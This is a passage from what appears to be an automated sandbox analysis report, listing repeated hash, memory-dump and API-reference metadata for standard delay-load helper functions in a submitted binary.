                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 168a5c421f863731bd1a929dc5f8718144399d37382c0fee216b98af1ac34182
                  • Instruction ID: 6d3c8cc08deb6c83ad37b549959508a4008eea5da80ae1912143785570fd70b2
                  • Opcode Fuzzy Hash: 168a5c421f863731bd1a929dc5f8718144399d37382c0fee216b98af1ac34182
                  • Instruction Fuzzy Hash: D1B0129226C0017C314C61046D16E36261CC5C1B21330805AB809D41C2D5419C8F3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 32c0add2c67d6316f7acee5e3816dedf08981b20e1a6ea27235e60a666f388a1
                  • Instruction ID: e9c1f6e6add16f5875d0f2ca3d734fe8f082d4af6d6f4ed3ed84a2d9c3cbd6be
                  • Opcode Fuzzy Hash: 32c0add2c67d6316f7acee5e3816dedf08981b20e1a6ea27235e60a666f388a1
                  • Instruction Fuzzy Hash: 6EB0129226C0017C314861046C16E36261CC5C2B21330C05ABC09D41C2D5409C8E3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 106e5ba65f43005b23c8fdd10218e92fb014a96b708cca7f056e1d74e1ae0969
                  • Instruction ID: b7dd83bbc15bdea154a4b5e3ad88ee96f281687be70daeb3f7ac00d5ebe364a4
                  • Opcode Fuzzy Hash: 106e5ba65f43005b23c8fdd10218e92fb014a96b708cca7f056e1d74e1ae0969
                  • Instruction Fuzzy Hash: 71B0129666D1057C314861046C56E3B261CE5C1B21330401AB809D40C2D5409C893532
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a00432666f9b39f1b00fd4575619744578c1f38a161de761311e934092723b2d
                  • Instruction ID: 9f8d5b9e648d212236911b07b4b897e3b8a14bbe204a8c02878ba4d9980e821c
                  • Opcode Fuzzy Hash: a00432666f9b39f1b00fd4575619744578c1f38a161de761311e934092723b2d
                  • Instruction Fuzzy Hash: D1B0129666C3017C354821006C66D3B261CC5C1B25330456BB809E40C2D5409CCD7432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 2d53b98f3467c7411c5001a5932c3f21581ba78fac52281236108d51cf42f396
                  • Instruction ID: f53b9f04c7e6cc920cd1800099de891c8fc0f96675848a8a881ca8b0841422f1
                  • Opcode Fuzzy Hash: 2d53b98f3467c7411c5001a5932c3f21581ba78fac52281236108d51cf42f396
                  • Instruction Fuzzy Hash: D5B012A226C0017C314C61046D16E36269CC5C1B21730401AB809D40C2D6409C8E3432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 091d1fd32c0ed5fd3343b29dc834e4dde6995c35ff2ff4aa1b2ae54c0de93d86
                  • Instruction ID: b749e8843fc32893956611b6cd999b8f5118db1c1e9fa90df074bffb04517e6a
                  • Opcode Fuzzy Hash: 091d1fd32c0ed5fd3343b29dc834e4dde6995c35ff2ff4aa1b2ae54c0de93d86
                  • Instruction Fuzzy Hash: 5EB0129227E0017C314861046C56E3A265DC9C1B21730401AB809D40C2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a564f63002bd1c02cba69d6dc8d7f14c69decb6da240ceddf04ada526912dcca
                  • Instruction ID: d127577689a6e1ec607657ec8fcedd138cada320fc99f3fb8cbf103a1e6887bb
                  • Opcode Fuzzy Hash: a564f63002bd1c02cba69d6dc8d7f14c69decb6da240ceddf04ada526912dcca
                  • Instruction Fuzzy Hash: 93B0129226C0017C314861146C16E36265CC5C2B21330801ABD09D40C2D7409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 61173eed5db2e5339cbb23f96f72a8f84e86e9d7a0d54ad7c3d500ae3a0e46dc
                  • Instruction ID: 7e6347e5c99d7c4790719e7a375b37c517e5fcbba74f662d51652419048da2ff
                  • Opcode Fuzzy Hash: 61173eed5db2e5339cbb23f96f72a8f84e86e9d7a0d54ad7c3d500ae3a0e46dc
                  • Instruction Fuzzy Hash: E7B012A226D1017C318862046C56E36261DC5C1B21730411BB809D40C2D5409CC93432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: f32351af707130a9ebe551547dff5b3ffa4bf4ed33039bb9bf9c8e7b534376b4
                  • Instruction ID: a669946d014dfa4e3d01c1322d8e112967981b6170cada9c15965dd28c6b2679
                  • Opcode Fuzzy Hash: f32351af707130a9ebe551547dff5b3ffa4bf4ed33039bb9bf9c8e7b534376b4
                  • Instruction Fuzzy Hash: F8B0129226D0017C314861046C56E36261DC5C2B21730801ABC09D40C2D5409C893432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 69d051af2567a876c5f37c9f46a8565ad02e81f8765ed98954900c3254f39f67
                  • Instruction ID: 25ea1bad10979aecb8f863a4da3bff511ef30fba4d36233b39256bb6d3850187
                  • Opcode Fuzzy Hash: 69d051af2567a876c5f37c9f46a8565ad02e81f8765ed98954900c3254f39f67
                  • Instruction Fuzzy Hash: F4B0129226D0017C314C71066C12F3E264CC0C5B20330851BB809C4147D4488C4F7432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7583ae6ee88c0c32668c5da01b708db58f52b66861f93f028a636f2aedd86b9a
                  • Instruction ID: 22d6a9b4fbfa5a118884c370a458442c8c31de6229cf97e95ac22af828a70c72
                  • Opcode Fuzzy Hash: 7583ae6ee88c0c32668c5da01b708db58f52b66861f93f028a636f2aedd86b9a
                  • Instruction Fuzzy Hash: A8B012A226C001BC314C71056C12E3A264CC0C0B20330C11BBC09C4157E44C8C4A7432
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 218333c29683e672c0c1867557452b11713a0830343f9fe38ec622775d4d1bc2
                  • Instruction ID: de745046bec05d83ef3a7bd5f70d51b1da9b60a6aee3217d66b51e0ae491fe5c
                  • Opcode Fuzzy Hash: 218333c29683e672c0c1867557452b11713a0830343f9fe38ec622775d4d1bc2
                  • Instruction Fuzzy Hash: C0B0129636C0077C314C52042D17E372A1CC0C0F20330801FB909C0042DA428C4D7132
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4dd6f709a81a659004b78c4c06783e07ef4f40f6b5dbefe2e0f033feb28baa11
                  • Instruction ID: ee28b2c798c2324a6b6f8615471fabc1476c775519c75c249a93006dc2f90f71
                  • Opcode Fuzzy Hash: 4dd6f709a81a659004b78c4c06783e07ef4f40f6b5dbefe2e0f033feb28baa11
                  • Instruction Fuzzy Hash: 2BB0129636C007BC314C52042C17E37262CC0C0F20330801FBC09C1042DA418C4C7132
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ef1c8ce70197ccc874ad88a907d5d7e91f8f96a54ed367831a95dc4520b48bb9
                  • Instruction ID: 1ef706a181204e52b5e99f13c70be2b12e5a0ad2c2a739275814411734e91491
                  • Opcode Fuzzy Hash: ef1c8ce70197ccc874ad88a907d5d7e91f8f96a54ed367831a95dc4520b48bb9
                  • Instruction Fuzzy Hash: F6B0129A36D0067C314852142C17F36261CD0C0F20330402FB90AC0442DA408C4C7132
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: cb94c1e51f65eb4a7cc5f0790cd7cfc510579868825ca9b6a41fdca4a9c48d7d
                  • Instruction ID: 8f2109c657ec56a3dab7968d7aebf1266421ac324fc9fef9e7438eb5d87575c2
                  • Opcode Fuzzy Hash: cb94c1e51f65eb4a7cc5f0790cd7cfc510579868825ca9b6a41fdca4a9c48d7d
                  • Instruction Fuzzy Hash: 9AB0129637C10B7C324C12002C17D37261CC0C0F20330412FB805D0042DA418C8C7032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ef0bac8c47b25dd7b6f9168a9c1ceec3a43aac91cad04035e59ef3b9b6cc86bf
                  • Instruction ID: e68ba2fa160ce2d5f5046ef566db30e6e8894125ba5615fd1a404de99b208f46
                  • Opcode Fuzzy Hash: ef0bac8c47b25dd7b6f9168a9c1ceec3a43aac91cad04035e59ef3b9b6cc86bf
                  • Instruction Fuzzy Hash: C9B012922AD1057C714C71056C12F3A264CE0C0B20330421BB809C414BD4488C4A7532
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
